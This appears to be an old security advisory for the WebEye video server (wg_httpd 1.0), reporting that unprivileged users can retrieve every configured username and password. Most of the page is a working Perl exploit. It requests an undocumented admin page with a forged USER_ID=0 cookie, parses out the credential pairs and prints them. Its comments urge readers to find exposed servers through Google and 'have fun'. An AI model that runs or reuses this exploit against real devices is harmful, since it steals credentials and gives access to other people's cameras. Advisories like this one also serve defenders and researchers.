|
|
|
|
| |
| WebEye "provides a quick and easy operation in accessing WebEye families (web cameras and web servers) that generates live images". A vulnerability in the product allows an attacker to gather a list of usernames and passwords configured in the server without needing any special privileges. |
| |
Credit:
The information has been provided by datapath.
|
| |
Vulnerable systems:
* wg_httpd version 1.0 (based Boa version 0.92q)
Exploit:
#!/usr/bin/perl
####################################################################
# Author: datapath
# E-mail: datapath@softhome.net
# Date: Dec 2003
# 44c545672ac14e9e0f968b3affcd0740
# WHAT IS THIS?
# This is an exploit to retrieve all username and passwords from a
# webeye video server.
# REQUIREMENTS
# It requires some perl libraries. If you dont have them already
# installed, search cpan.org.
# HOW DOES IT WORKS?
# Well, its very simple, because the server provides a mechanism (not
# documented) to retrieve all passwords! You can read the code below,
# its short and simple.
# If you think its fun, but dont know any webeye video server, just make a
# search in Google. You will find a lot of them! Have fun!
###########################################################################
use LWP::UserAgent;
use HTTP::Cookies;
$host=shift;
$port=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl <host name> [port]\n";
exit;
}
if ($port eq "")
{
$port = "80";
}
my $browser = LWP::UserAgent->new();
my $resp = $browser->get("http://$host\:$port/admin/wg_user-info.ml","Cookie","USER_ID=0; path=/;");
# print "resp: $resp\n";
$t = $resp->content;
# print "t: $t\n";
$i = index($t,"<tr");
substr($t,0,$i+1,"");
while ($i!=-1) {
$i = index($t,"<tr");
substr($t,0,$i+1,"");
$i = index($t,"value=");
substr($t,0,$i+7,"");
$j = index($t,"\"");
$user = substr($t,0,$j);
if ($user =~ /Apply/) { print "\nHave fun!\n"; exit; }
print "user: ".$user;
$i = index($t,"value=");
substr($t,0,$i+7,"");
$j = index($t,"\"");
print "\tpass: ".substr($t,0,$j)."\n";
}
|
|
|
|
|
|
|
|
|
|
